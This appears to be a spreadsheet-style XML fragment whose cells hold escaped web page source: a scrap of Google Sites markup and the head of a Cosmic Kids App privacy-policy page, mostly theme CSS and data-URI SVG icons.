    <t>nonce="_9n4RqpQXYhRC83kacRrKQ"&gt;const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data-sitename="gamesfarm" data-domain="gamesfarmllc.com" data-universe="1"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mouseup:lbsD7e; mouseenter:tfO1Yc; mouseleave:JywGue; focus:AHmuwe; blur:O22p3e; contextmenu:mg9Pef;touchstart:p6p2H; touchmove:FwuNnf; touchend: yfqBxc(preventMouseEvents=true|preventDefault=true); touchcancel:JMtRjd;" jsshadow jsname="GeGHKb" aria-label="Back to site" aria-disabled="false" tabindex="0" data-tooltip="Back to site" data-tooltip-vertical-offset="-12" data-tooltip-horizontal-offset="0"&gt;&lt;div class="VTBa7b MbhUzd" jsname="ksKsZd"&gt;&lt;/div&gt;&lt;span jsslot class="xjKiLb"&gt;&lt;span class="Ce1Y1c" style="top: -12px"&gt;&lt;svg class="V4YR2c" viewBox="0 0 24 24" focusable="false"&gt;&lt;path d="M0 0h24v24H0z" fill="none"/&gt;&lt;path d="M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.41L7.83 13H20v-2z"/&gt;&lt;/svg&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="E2UJ5" jsname="M6JdT"&gt;&lt;div class="rFrNMe b7AJhc zKHdkd" jscontroller="pxq3x" jsaction="clickonly:KjsqPd; focus:Jt1EX; blur:fpfTEe; input:Lg5SV"</t>
  </si>
  <si>
    <t>&lt;!doctype html&gt;
&lt;!--[if lt IE 7]&gt; &lt;html class="no-js lt-ie9 lt-ie8 lt-ie7" lang="en" xml:lang="en"&gt; &lt;! [endif]--&gt;
&lt;!--[if</t>
  </si>
  <si>
    <t>IE 7]&gt;    &lt;html class="no-js lt-ie9 lt-ie8" lang="en" xml:lang="en"&gt; &lt;! [endif]--&gt;
&lt;!--[if IE 8]&gt;    &lt;html class="no-js lt-ie9" lang="en" xml:lang="en"&gt; &lt;!</t>
  </si>
  <si>
    <t>[endif]--&gt;
&lt;!--[if gt IE 8]&gt;&lt;!--&gt; &lt;html class="no-js" lang="en" xml:lang="en"&gt; &lt;!--&lt;![endif]--&gt;
&lt;head lang="en" xml:lang="en"&gt;
  &lt;meta charset="utf-8"&gt;
  &lt;meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"&gt;
  &lt;meta name="viewport" content="width=device-width, initial-scale=1"&gt;
    &lt;link rel="shortcut icon" href="https://dr56wvhu2c8zo.cloudfront.net/cosmickids/assets/c17a0b90-1dd9-4702-996b-8662aeff032f/favicon1.ico" type="image/png"&gt;
  &lt;title&gt;Privacy Policy - Cosmic Kids App&lt;/title&gt;
  &lt;meta name="description" content="The complete Cosmic Kids library. Unlimited Streaming.</t>
  </si>
  <si>
    <t>Ad-free. Across multiple devices. "&gt;
  &lt;link rel="canonical" href="https://app.cosmickids.com/privacy" /&gt;
&lt;link rel="author" href="/humans.txt"&gt;
&lt;meta name="csrf-param" content="authenticity_token" /&gt;
&lt;meta name="csrf-token" content="BJEjj4g5v8Q1UE+1wQGCg0x4lu3eCWgN/dG2kxAjL0VG81AmELa28UqrebY40CtrdEJj0XQ6zkgT6ROQgSHhjA==" /&gt;
  &lt;link rel="stylesheet" media="all" href="https://cdn.vhx.tv/assets/webpack/subpage-ottbundle-bc4d128240943a1c8221.css" /&gt;
&lt;style&gt;
    @import url('https://fonts.googleapis.com/css2?family=Poppins&amp;amp;display=swap');
  /* main colors */
  .site-background-color {
    background-color: #141414 !</t>
  </si>
  <si>
    <t>important;
  }
  .site-primary-highlight-color {
    background: #f9ea32 !important;
  }
  .site-primary-color,
  strong.site-primary-color,
  .site-primary-color strong,
  a.site-primary-color:link,
  a.site-primary-color:visited {
    color: #f9ea32 !important;
  }
  a.site-primary-color:hover,
  a.site-primary-color:active {
    color: #d4c72b !important;
  }
  .site-border-color,
  .site-border-color.border-light {
    border-color: #323232 ! important;
  }
  .site-border-primary-color,
  .site-border-primary-color.border-light {
    border-color: #f9ea32 !important;
  }
  /* site font override */
  .site-background-color *:not(.admin-preview-banner *, .environment-label-wrapper, .fa, .fab) {
    font-family: 'Poppins', sans-serif !</t>
  </si>
  <si>
    <t>important;
  }
  /* font primary color */
  .site-font-primary-color,
  .site-font-primary-color strong {
    color: #ffffff !important;
  }
  /* font secondary color */
  .site-font-secondary-color,
  .site-font-secondary-color strong {
    color: #bebebb !important;
  }
  /* link primary color */
  a.site-link-primary-color:link,
  a.site-link-primary-color:visited,
  a.site-link-primary-color strong {
    color: #ffffff !important;
  }
  a.site-link-primary-color:hover,
  a.site-link-primary-color:active {
    color: #d9d9d9 !important;
    opacity: .7;
  }
  .site-link-primary-color-contain a:link,
  .site-link-primary-color-contain a:visited {
    color: #f9ea32 !important;
  }
  .site-link-primary-color-contain a:hover,
  .site-link-primary-color-contain a:active {
    color: #d4c72b !important;
    opacity: .7;
  }
  /* link secondary color */
  .pagination a,
  a.site-link-secondary-color:link,
  a.site-link-secondary-color:visited,
  a.site-link-secondary-color strong,
  .site-link-secondary-color-contain a:link,
  .site-link-secondary-color-contain a:visited {
    color: #7c7c7c;
  }
  .pagination a:hover,
  a.site-link-secondary-color:hover,
  a.site-link-secondary-color:active,
  .site-link-secondary-color-contain a:hover,
  .site-link-secondary-color-contain a:active {
    color: #696969;
    opacity: .7;
  }
  /* link underline font primary color */
  .site-link-contain a:link,
  .site-link-contain a:visited {
    color: #ffffff !important;
    text-decoration: underline;
  }
  .site-link-contain a:hover,
  .site-link-contain a:active {
    color: #ffffff !important;
    opacity: .7;
    text-decoration: underline;
  }
  /* border color same as primary color */
  .site-border-primary-color {
    border-color: #ffffff !important;
  }
  .site-border-top-primary-color {
    border-top-color: #ffffff !important;
  }
  .site-border-bottom-primary-color {
    border-bottom-color: #ffffff !important;
  }
  .site-border-left-primary-color {
    border-left-color: #ffffff !important;
  }
  .site-border-right-primary-color {
    border-right-color: #ffffff !important;
  }
  /* link header color */
  a.site-link-header-color:link,
  a.site-link-header-color:visited,
  a.site-link-header-color:link strong,
  a.site-link-header-color:visited strong {
    color: #66d3a8 !</t>
  </si>
  <si>
    <t>important;
  }
  a.site-link-header-color:hover,
  a.site-link-header-color:active {
    color: #57b38f;
    opacity: .7;
  }
 .avatar-chevron.icon {
    background-image: url("data:image/svg+xml;charset=US-ASCII,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20width%3D%2223%22%20height%3D%2223%22%20viewBox%3D%220%200%2023%2023%22%3E%3Cpolygon%20fill%3D%22%23ffffff%22%20points%3D%2222.9%2C7.2%2020%2C4.4%2011.5%2C12.9%203%2C4.4%200.1%2C7.2%208.7%2C15.7%208.7%2C15.7%2011.5%2C18.6%2011.5%2C18.6%2011.5%2C18.6%2014.3%2C15.7%2014.3%2C15.7%20%22%2F%3E%3C%2Fsvg%3E%0A");
    background-repeat: no-repeat;
  }
  .user-dropdown a:hover {
    background-color: rgba(20,42,34,0.2);
    color: #fff;
  }
  .user-dropdown input {
    background-color: #66d3a8;
  }
  .user-dropdown input:hover {
    background-color: rgba(20,42,34,0.2);
    color: #fff;
  }
  /* buttons site primary */
  .btn-site-primary,
  .btn-site-primary:link,
  .btn-site-primary:visited {
    color: #000;
    border-color: #d4c72b;
    background-color: #f9ea32;
  }
  .btn-site-primary:hover,
  .btn-site-primary.is-hover,
  .btn-site-primary:focus,
  .btn-site-primary:focus:hover,
  .btn-site-primary:active,
  .btn-site-primary.is-active {
    border-color: #d4c72b;
    background-color: #d4c72b;
    color: #000;
  }
  .btn-site-primary[disabled],
  .btn-site-primary.is-disabled,
  .btn-site-primary[disabled]:visited,
  .btn-site-primary.is-disabled:visited,
  .btn-site-primary[disabled]:hover,
  .btn-site-primary.is-disabled:hover,
  .btn-site-primary[disabled].is-hover,
  .btn-site-primary.is-disabled.is-hover,
  .btn-site-primary[disabled]:active,
  .btn-site-primary.is-disabled:active,
  .btn-site-primary[disabled]:focus,
  .btn-site-primary.is-disabled:focus,
  .btn-site-primary[disabled]:focus:hover,
  .btn-site-primary.is-disabled:focus:hover,
  .btn-site-primary[disabled].is-active,
  .btn-site-primary.is-disabled.is-active {
    opacity: .5;
    background-color: #f9ea32;
    color: #000;
    border-color: #d4c72b;
  }
  /* buttons site secondary */
  .btn-site-secondary,
  .btn-site-secondary:link,
  .btn-site-secondary:visited {
    color: #bebebb;
    border-color: #141414;
    background-color: #323232;
  }
  .btn-site-secondary:hover,
  .btn-site-secondary.is-hover,
  .btn-site-secondary:focus,
  .btn-site-secondary:active,
  .btn-site-secondary.is-active {
    color: #5f5f5e;
    border-color: #0f0f0f;
    background-color: #323232;
  }
  .btn-site-primary.is-processing,
  .btn-site-secondary.is-processing {
    color: transparent !important;
    background-position: center center ! important;
    background-repeat: no-repeat;
    background-size: 23px 23px;
    background-image: url('data:image/svg+xml;charset=utf-8,%3Csvg%20version%3D%221.1%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Axlink%3D%22http%3A%2F%2Fwww.w3.org%2F1999%2Fxlink%22%20x%3D%220px%22%20y%3D%220px%22%0D%0A%20%20viewBox%3D%220%200%2040%2040%22%20xml%3Aspace%3D%22preserve%22%3E%0D%0A%3Cpath%20opacity%3D%220.2%22%20fill%3D%22%23000000%22%20d%3D%22M20.201%2C5.169c-8.254%2C0-14.946%2C6.692-14.946%2C14.946c0%2C8.255%2C6.692%2C14.946%2C14.946%2C14.946%0D%0A%20%20s14.946-6.691%2C14.946-14.946C35.146%2C11.861%2C28.455%2C5.169%2C20.201%2C5.169z%20M20.201%2C31.749c-6.425%2C0-11.634-5.208-11.634-11.634%0D%0A%20%20c0-6.425%2C5.209-11.634%2C11.634-11.634c6.425%2C0%2C11.633%2C5.209%2C11.633%2C11.634C31.834%2C26.541%2C26.626%2C31.749%2C20.201%2C31.749z%22%2F%3E%0D%0A%3Cpath%20fill%3D%22%23000000%22%20d%3D%22M26.013%2C10.047l1.654-2.866c-2.198-1.272-4.743-2.012-7.466-2.012h0v3.312h0%0D%0A%20%20C22.32%2C8.481%2C24.301%2C9.057%2C26.013%2C10.047z%22%3E%0D%0A%20%20%3CanimateTransform%20attributeType%3D%22xml%22%0D%0A%20%20%20%20attributeName%3D%22transform%22%0D%0A%20%20%20%20type%3D%22rotate%22%0D%0A%20%20%20%20from%3D%220%2020%2020%22%0D%0A%20%20%20%20to%3D%22360%2020%2020%22%0D%0A%20%20%20%20dur%3D%220.5s%22%0D%0A%20%20%20%20repeatCount%3D%22indefinite%22%2F%3E%0D%0A%20%20%3C%2Fpath%3E%0D%0A%3C%2Fsvg%3E');
  }
  /* buttons dropdown */
  .btn-dropdown-site,
  .btn-dropdown-site:link,
  .btn-dropdown-site:visited {
    color: #000000;
    border-color: #f9ea32;
    background-color: #f9ea32;
  }
  .btn-dropdown-site:hover,
  .btn-dropdown-site.is-hover,
  .btn-dropdown-site:focus,
  .btn-dropdown-site:active,
  .btn-dropdown-site.is-active {
    border-color: #f9ea32;
    background-color: #d4c72b;
  }
  .site-btn-block,
  .site-btn-block:link,
  .site-btn-block:visited {
    color: #ffffff;
  }
  .site-btn-block:hover,
  .site-btn-block.is-hover,
  .site-btn-block.is-active,
  .site-btn-block:active {
    box-shadow: inset</t>
  </si>
  <si>
    <t>0px -4px 0px #ffffff;
  }
  .site-form-color input[type="email"],
  .site-form-color input[type="text"],
  .site-form-color input[type="search"],
  .site-form-color input[type="password"],
  .site-form-color input[type="tel"],
  .site-form-color textarea {
    color: #323232 ! important;
    border-color: #696969 !</t>
  </si>
  <si>
    <t>important;
    background-color:  #fcfcfc !important;
  }
  .site-form-color label,
  .site-form-color-minimal input[type="email"],
  .site-form-color-minimal input[type="text"],
  .site-form-color-minimal input[type="search"],
  .site-form-color-minimal input[type="password"],
  .site-form-color-minimal textarea {
    color: #ffffff;
    background: transparent !important;
  }
  .site-form-color input[type="text"]:focus,
  .site-form-color input[type="search"]:focus,
  .site-form-color input[type="password"]:focus,
  .site-form-color input[type="tel"]:focus,
  .site-form-color textarea:focus {
    border-color: #7c7c7c !important;
  }
  .site-form-color input[type="text"]::-webkit-input-placeholder,
  .site-form-color-minimal input[type="text"]::-webkit-input-placeholder,
  .site-form-color input[type="email"]::-webkit-input-placeholder,
  .site-form-color-minimal input[type="email"]::-webkit-input-placeholder,
  .site-form-color input[type="search"]::-webkit-input-placeholder,
  .site-form-color-minimal input[type="search"]::-webkit-input-placeholder,
  .site-form-color input[type="password"]::-webkit-input-placeholder,
  .site-form-color-minimal input[type="password"]::-webkit-input-placeholder,
  .site-form-color input[type="tel"]::-webkit-input-placeholder,
  .site-form-color-minimal input[type="tel"]::-webkit-input-placeholder,
  .site-form-color textarea::-webkit-input-placeholder,
  .site-form-color-minimal textarea::-webkit-input-placeholder {
    color: #323232 ! important;
    opacity: .5;
  }
  .site-form-color input[type="text"]::-moz-input-placeholder,
  .site-form-color-minimal input[type="text"]::-moz-input-placeholder,
  .site-form-color input[type="email"]::-moz-input-placeholder,
  .site-form-color-minimal input[type="email"]::-moz-input-placeholder,
  .site-form-color input[type="search"]::-moz-input-placeholder,
  .site-form-color-minimal input[type="search"]::-moz-input-placeholder,
  .site-form-color input[type="password"]::-moz-input-placeholder,
  .site-form-color-minimal input[type="password"]::-moz-input-placeholder,
  .site-form-color input[type="tel"]::-moz-input-placeholder,
  .site-form-color-minimal input[type="tel"]::-moz-input-placeholder,
  .site-form-color textarea::-moz-input-placeholder,
  .site-form-color-minimal textarea::-moz-input-placeholder {
    color: #323232 ! important;
    opacity: .5;
  }
  .site-form-color input[type="text"]:-moz-input-placeholder,
  .site-form-color-minimal input[type="text"]:-moz-input-placeholder,
  .site-form-color input[type="email"]:-moz-input-placeholder,
  .site-form-color-minimal input[type="email"]:-moz-input-placeholder,
  .site-form-color input[type="search"]:-moz-input-placeholder,
  .site-form-color-minimal input[type="search"]:-moz-input-placeholder,
  .site-form-color input[type="password"]:-moz-input-placeholder,
  .site-form-color-minimal input[type="password"]:-moz-input-placeholder,
  .site-form-color input[type="tel"]:-moz-input-placeholder,
  .site-form-color-minimal input[type="tel"]:-moz-input-placeholder,
  .site-form-color textarea:-moz-input-placeholder,
  .site-form-color-minimal textarea:-moz-input-placeholder {
    color: #323232 !</t>
  </si>
  <si>
    <t>important;
    opacity: .5;
  }
  .site-form-color input[type="text"]:-ms-input-placeholder,
  .site-form-color-minimal input[type="text"]:-ms-input-placeholder,
  .site-form-color input[type="email"]:-ms-input-placeholder,
  .site-form-color-minimal input[type="email"]:-ms-input-placeholder,
  .site-form-color input[type="search"]:-ms-input-placeholder,
  .site-form-color-minimal input[type="search"]:-ms-input-placeholder,
  .site-form-color input[type="password"]:-ms-input-placeholder,
  .site-form-color-minimal input[type="password"]:-ms-input-placeholder,
  .site-form-color input[type="tel"]:-ms-input-placeholder,
  .site-form-color-minimal input[type="tel"]:-ms-input-placeholder,
  .site-form-color textarea:-ms-input-placeholder,
  .site-form-color-minimal textarea:-ms-input-placeholder {
    color: #323232 ! important;
    opacity: .5;
  }
  .site-form-color .radio label .radio--icon {
    border-color: #bebebb !important;
  }
  .site-form-color .radio.primary .circle-top span {
    background: #f9ea32 !important;
  }
  .site-form-color .radio.primary .circle-bottom span {
    background: #c7bb28 !important;
  }
  /* header */
  .site-header {
    border-bottom: 1px solid #2e2e2e;
    background-color: #ffffff;
  }
  .site-header-background-color {
    background-color: #ffffff;
  }
  @media only screen and (max-width: 40em) {
     .site-header-background-color-small-only {
      background-color: #ffffff;
    }
  }
  /* modals */
  .site-modal {
    box-shadow: inset 0 0 2px #7c7c7c !important;
  }
  /* tooltips */
  .tooltip.bottom-right:after,
  .tooltip.bottom-left:after,
  .tooltip.bottom:</t>
  </si>
  <si>
    <t>after,
  .tooltip.bottom-right:before,
  .tooltip.bottom-left:before,
  .tooltip.bottom:before {
    border-top-color: #7c7c7c;
  }
  .tooltip.right:after,
  .tooltip.right:after
  .tooltip.right-top:after,
  .tooltip.right-top:before,
  .tooltip.right-bottom:before,
  .tooltip.right-bottom:before {
    border-right-color: #7c7c7c;
  }
  .tooltip.left-bottom:after,
  .tooltip.left-top:after,
  .tooltip.left:after,
  .tooltip.left-bottom:before,
  .tooltip.left-top:before,
  .tooltip.left:before {
    border-left-color: #7c7c7c;
  }
  .tooltip.top-right:after,
  .tooltip.top-left:after,
  .tooltip.top: after,
  .tooltip.top-right:before,
  .tooltip.top-left:before,
  .tooltip.top:before {
    border-bottom-color: #7c7c7c;
  }
  .tooltip {
    border: 1px solid #7c7c7c;
    background: #7c7c7c;
    color: #ffffff;
  }
  .reveal-modal {
    border-color: #323232;
    box-shadow: 0 0 3px #cbcbcb;
  }
  .reveal-modal-bg {
    background-color: rgba(0,0,0,.8);
  }
  .play-outer-circle-large:hover {
    border-color:</t>
  </si>
  <si>
    <t xml:space="preserve">#f9ea32;
  }
  .forums-container tr.clickable:hover .thread-activity {
    background-color: #141414;
  }
    [data-flash].is-inline.is-error {
      background: rgba(211, 16, 74, 1) ! important;
    }
    [data-flash].is-inline.is-error .flash-msg,
    [data-flash].is-inline.is-error .flash-msg strong {
      color: #fff !important;
    }
     [data-flash].is-inline.is-error .flash-close .icon-remove-mono {
      display: none !important;
    }
    </t>
  </si>
  <si>
    <t>[data-flash].is-inline.is-error .flash-close .icon-remove-inverse {
      display: block !important;
    }
  /* custom banner */
    .custom-banner--container {
      background-color: #67bd9a;
    }
    .custom-banner--header, .custom-banner--subtext {
      color: #ffffff;
    }
&lt;/style&gt;
&lt;style&gt;
  /* icons site primary */
  .site-icon-arrow-right {
    background-image: url('data:image/svg+xml;charset=utf-8,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20width%3D%2223%22%20height%3D%2223%22%20viewBox%3D%220%200%2023%2023%22%3E%3Ctitle%3Eicons-arrows-set%20copy%3C%2Ftitle%3E%3Cpath%20d%3D%22M5.61%2C19.75l8.26-8.26L5.61%2C3.24c-0.68-.69.61-1.58%2C1-2%2C0.72-.69%2C1.76.78%2C2.2%2C1.22l3.39%2C3.39L17.41%2C11c0.71%2C0.69-.8%2C1.77-1.22%2C2.19L12.8%2C16.59%2C7.63%2C21.77c-0.7.67-1.58-.61-2-1A0.68%2C0.68%2C0%2C0%2C1%2C5.61%2C19.75Z%22%20fill%3D%22%23f9ea32%22%2F%3E%3C%2Fsvg%3E');
    background-repeat: no-repeat;
  }
  .site-icon-menu {
    background-image: url('data:image/svg+xml;charset=utf-8,%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22utf-8%22%3F%3E%0D%0A%3C%21DOCTYPE%20svg%20PUBLIC%20%22-%2F%2FW3C%2F%2FDTD%20SVG%201.1%2F%2FEN%22%20%22http%3A%2F%2Fwww.w3.org%2FGraphics%2FSVG%2F1.1%2FDTD%2Fsvg11.dtd%22%3E%0D%0A%3Csvg%20version%3D%221.1%22%20id%3D%22Hamburger%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Axlink%3D%22http%3A%2F%2Fwww.w3.org%2F1999%2Fxlink%22%20x%3D%220px%22%20y%3D%220px%22%0D%0A%09%20width%3D%2223px%22%20height%3D%2223px%22%20viewBox%3D%220%200%2023%2023%22%20style%3D%22enable-background%3Anew%200%200%2023%2023%3B%22%20xml%3Aspace%3D%22preserve%22%3E%0D%0A%3Crect%20x%3D%222.6%22%20y%3D%223.6%22%20width%3D%2218%22%20height%3D%223%22%20fill%3D%22%23ffffff%22%2F%3E%0D%0A%3Crect%20x%3D%222.6%22%20y%3D%2210%22%20width%3D%2218%22%20height%3D%223%22%20fill%3D%22%23ffffff%22%2F%3E%0D%0A%3Crect%20x%3D%222.6%22%20y%3D%2216.3%22%20width%3D%2218%22%20height%3D%223%22%20fill%3D%22%23ffffff%22%2F%3E%0D%0A%3C%2Fsvg%3E');
    background-repeat: no-repeat;
  }
  .site-icon-chrevron-down {
    background-image: url('data:image/svg+xml;charset=utf-8,%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22utf-8%22%3F%3E%0D%0A%3C%21--%20Generator%3A%20Adobe%20Illustrator%2018.1.1%2C%20SVG%20Export%20Plug-In%20.%20SVG%20Version%3A%206.00%20Build%200%29%20%20--%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20%20%20width%3D%2223px%22%20height%3D%2223px%22%20viewBox%3D%22-294%20385%2023%2023%22%20enable-background%3D%22new%20-294%20385%2023%2023%22%20xml%3Aspace%3D%22preserve%22%3E%0D%0A%3Cg%3E%0D%0A%20%20%3Cpolygon%20fill%3D%22%23ffffff%22%20points%3D%22-271.1%2C392.9%20-275.4%2C388.7%20-282.5%2C395.8%20-289.6%2C388.7%20-293.9%2C392.9%20-286.7%2C400%20-286.8%2C400.1%20%0D%0A%20%20%20%20-282.5%2C404.3%20-282.5%2C404.3%20-282.5%2C404.3%20-278.2%2C400.1%20-278.3%2C400%20%20%22%2F%3E%0D%0A%3C%2Fg%3E%0D%0A%3C%2Fsvg%3E');
    background-repeat: no-repeat;
  }
  .site-icon-chat {
    background-image: url('data:image/svg+xml;charset=utf-8,%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22utf-8%22%3F%3E%0D%0A%3C%21--%20Generator%3A%20Adobe%20Illustrator%2018.1.1%2C%20SVG%20Export%20Plug-In%20.%20SVG%20Version%3A%206.00%20Build%200%29%20%20--%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-294%20385%2023%2023%22%20enable-background%3D%22new%20-294%20385%2023%2023%22%20xml%3Aspace%3D%22preserve%22%3E%0D%0A%3Cg%3E%0D%0A%09%3Cg%3E%0D%0A%09%09%3Cpath%20fill%3D%22%23ffffff%22%20d%3D%22M-282.5%2C388.6c2.6%2C0%2C5.1%2C0.1%2C6.8%2C1.3c1.9%2C1.4%2C1.9%2C4.3%2C1.7%2C6c-0.2%2C2.1-1.2%2C3.5-3%2C4.2%0D%0A%09%09%09c-1.3%2C0.5-3%2C0.7-5.1%2C0.7c-1%2C0-2.1-0.1-3.4-0.2l-1-0.1l0%2C0l-1.2-0.4c-1.1-0.3-2.5-1-3.1-2.6c-0.7-1.8-0.7-4.2%2C0-5.9%0D%0A%09%09%09C-289.6%2C389.1-286.6%2C388.6-282.5%2C388.6%20M-282.5%2C386.6c-3.7%2C0-8.4%2C0.3-9.9%2C4.3c-0.9%2C2.2-0.9%2C5.1%2C0%2C7.4c0.7%2C2%2C2.4%2C3.2%2C4.3%2C3.8v3.2%0D%0A%09%09%09l2.6-2.7c1.1%2C0.1%2C2.4%2C0.2%2C3.6%2C0.2c2%2C0%2C4-0.2%2C5.7-0.9c2.6-1%2C4-3.1%2C4.3-5.8c0.3-2.8-0.1-6.1-2.6-7.9%0D%0A%09%09%09C-276.7%2C386.6-279.8%2C386.6-282.5%2C386.6L-282.5%2C386.6z%22%2F%3E%0D%0A%09%3C%2Fg%3E%0D%0A%3C%2Fg%3E%0D%0A%3C%2Fsvg%3E');
    background-repeat: no-repeat;
  }
  /* icons site social */
  .site-icon-twitter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-294%20385%2023%2023%22%20enable-background%3D%22new%20-294%20385%2023%2023%22%20xml%3Aspace%3D%22preserve%22%3E%0D%0A%3Cg%3E%0D%0A%09%3Cpath%20fill%3D%22%23ffffff%22%20d%3D%22M-272.5%2C390.3c-0.7%2C0.3-1.5%2C0.5-2.4%2C0.6c0.8-0.5%2C1.5-1.3%2C1.8-2.3c-0.8%2C0.5-1.7%2C0.8-2.6%2C1%0D%0A%09%09c-2.8-3-7.9-0.2-7%2C3.7c-3.4-0.1-6.4-1.7-8.4-4.2c-1.1%2C1.9-0.5%2C4.3%2C1.3%2C5.5c-0.7%2C0-1.3-0.2-1.9-0.5c0%2C1.9%2C1.4%2C3.7%2C3.3%2C4.1%0D%0A%09%09c-0.6%2C0.2-1.2%2C0.2-1.9%2C0.1c0.5%2C1.6%2C2%2C2.8%2C3.8%2C2.8c-1.7%2C1.3-3.9%2C2-6.1%2C1.7c4%2C2.6%2C9.5%2C2.5%2C13.4-0.5c3-2.3%2C4.8-6.1%2C4.6-9.9%0D%0A%09%09C-273.7%2C391.8-273.1%2C391.1-272.5%2C390.3C-273.2%2C390.6-273.1%2C391.1-272.5%2C390.3z%22%2F%3E%0D%0A%3C%2Fg%3E%0D%0A%3C%2Fsvg%3E');
    background-repeat: no-repeat;
  }
  .site-icon-facebook {
    background-image: url('data:image/svg+xml;charset=utf-8,%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22utf-8%22%3F%3E%0D%0A%3C%21--%20Generator%3A%20Adobe%20Illustrator%2018.1.1%2C%20SVG%20Export%20Plug-In%20.%20SVG%20Version%3A%206.00%20Build%200%29%20%20--%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-294%20385%2023%2023%22%20enable-background%3D%22new%20-294%20385%2023%2023%22%20xml%3Aspace%3D%22preserve%22%3E%0D%0A%3Cpath%20fill%3D%22%23ffffff%22%20d%3D%22M-280.4%2C406.8v-9.3h3.4v-4h-3.4v-2.1c0-0.5%2C0.3-0.9%2C0.9-0.9h2.6v-4.5h-2.8c-3%2C0-5.3%2C2.4-5.3%2C5.5v2.1h-3.1v4%0D%0A%09h3.1v9.3h4.6L-280.4%2C406.8z%22%2F%3E%0D%0A%3C%2Fsvg%3E');
    background-repeat: no-repeat;
  }
  .site-icon-tumblr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g%3E%0D%0A%09%3Cpath%20style%3D%22fill%3A%23ffffff%3B%22%20d%3D%22M17.6%2C20.4c-2%2C1-4.4%2C1.4-6.6%2C0.8c-2.3-0.6-3.4-2.3-3.4-4.5v-7H5.4V6.9c2.5-0.8%2C3.7-2.9%2C4-5.4h2.8%0D%0A%09%09v5.1h4.7v3.1h-4.7v5.1c0%2C1-0.2%2C2.4%2C0.9%2C3c1.4%2C0.8%2C3.2%2C0.2%2C4.5-0.6V20.4z%22%2F%3E%0D%0A%3C%2Fg%3E%0D%0A%3C%2Fsvg%3E');
    background-repeat: no-repeat;
  }
  .site-icon-envelope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g%3E%0D%0A%09%3Cpath%20style%3D%22fill%3A%23ffffff%3B%22%20d%3D%22M22.6%2C9c0-0.2-0.1-0.5-0.3-0.6L12%2C0.8c-0.3-0.2-0.6-0.2-0.9%2C0L0.7%2C8.4C0.5%2C8.5%2C0.4%2C8.8%2C0.4%2C9v12.6%0D%0A%09%09c0%2C0.4%2C0.3%2C0.8%2C0.8%2C0.8h20.7c0.4%2C0%2C0.8-0.4%2C0.8-0.8V9z%20M11.5%2C2.4l9.6%2C7v0.9l-6.6%2C4.7l5.2%2C3.3c0.8%2C0.5%2C0%2C1.8-0.8%2C1.3L11.5%2C15%0D%0A%09%09l-7.4%2C4.7c-0.8%2C0.5-1.7-0.8-0.8-1.3l5.2-3.3l-6.6-4.7V9.4L11.5%2C2.4z%22%2F%3E%0D%0A%09%3Cpath%20style%3D%22fill%3A%23ffffff%3B%22%20d%3D%22M19.7%2C18.4%22%2F%3E%0D%0A%09%3Cpolygon%20style%3D%22fill%3A%23ffffff%3B%22%20points%3D%2211.5%2C13.1%2013.4%2C14.3%2019.5%2C9.9%2011.5%2C4%203.5%2C9.9%209.6%2C14.3%20%09%22%2F%3E%0D%0A%3C%2Fg%3E%0D%0A%3C%2Fsvg%3E');
    background-repeat: no-repeat;
  }
  .site-icon-check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g%3E%0D%0A%09%0D%0A%09%09%3Crect%20x%3D%2211.9%22%20y%3D%222.1%22%20transform%3D%22matrix%28-0.7072%20-0.7071%200.7071%20-0.7072%2016.2216%2029.719%29%22%20style%3D%22fill%3A%23ffffff%3B%22%20width%3D%224.7%22%20height%3D%2218.8%22%2F%3E%0D%0A%09%0D%0A%09%09%3Crect%20x%3D%220.2%22%20y%3D%2211.3%22%20transform%3D%22matrix%280.7072%200.707%20-0.707%200.7072%2011.5962%20-0.598%29%22%20style%3D%22fill%3A%23ffffff%3B%22%20width%3D%2212.5%22%20height%3D%224.7%22%2F%3E%0D%0A%3C%2Fg%3E%0D%0A%3C%2Fsvg%3E');
    background-repeat: no-repeat;
  }
  /* icons site secondary */
  .site-icon-clock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g%3E%0D%0A%09%3Cpath%20style%3D%22fill%3A%23bebebb%3B%22%20d%3D%22M11.5%2C22c-4.5%2C0-8.6-3-10-7.3c-1.4-4.3%2C0.2-9.2%2C4-11.8c3.7-2.6%2C8.9-2.5%2C12.5%2C0.3%0D%0A%09%09c3.6%2C2.8%2C5%2C7.7%2C3.4%2C12C19.8%2C19.3%2C15.8%2C22%2C11.5%2C22z%20M11.5%2C3.3C7%2C3.3%2C3.3%2C7%2C3.3%2C11.5c0%2C4.5%2C3.7%2C8.2%2C8.2%2C8.2c4.5%2C0%2C8.2-3.7%2C8.2-8.2%0D%0A%09%09C19.7%2C7%2C16%2C3.3%2C11.5%2C3.3z%22%2F%3E%0D%0A%09%3Cpath%20style%3D%22fill%3A%23ffffff%3B%22%20d%3D%22M12.9%2C12.9v-2.9V5.5c0-0.4-0.4-0.8-0.8-0.8h-1.3c-0.4%2C0-0.8%2C0.4-0.8%2C0.8v4.5H6.5%0D%0A%09%09c-0.4%2C0-0.8%2C0.4-0.8%2C0.8v1.3c0%2C0.4%2C0.4%2C0.8%2C0.8%2C0.8h3.5H12.9z%22%2F%3E%0D%0A%3C%2Fg%3E%0D%0A%3C%2Fsvg%3E');
    background-repeat: no-repeat;
  }
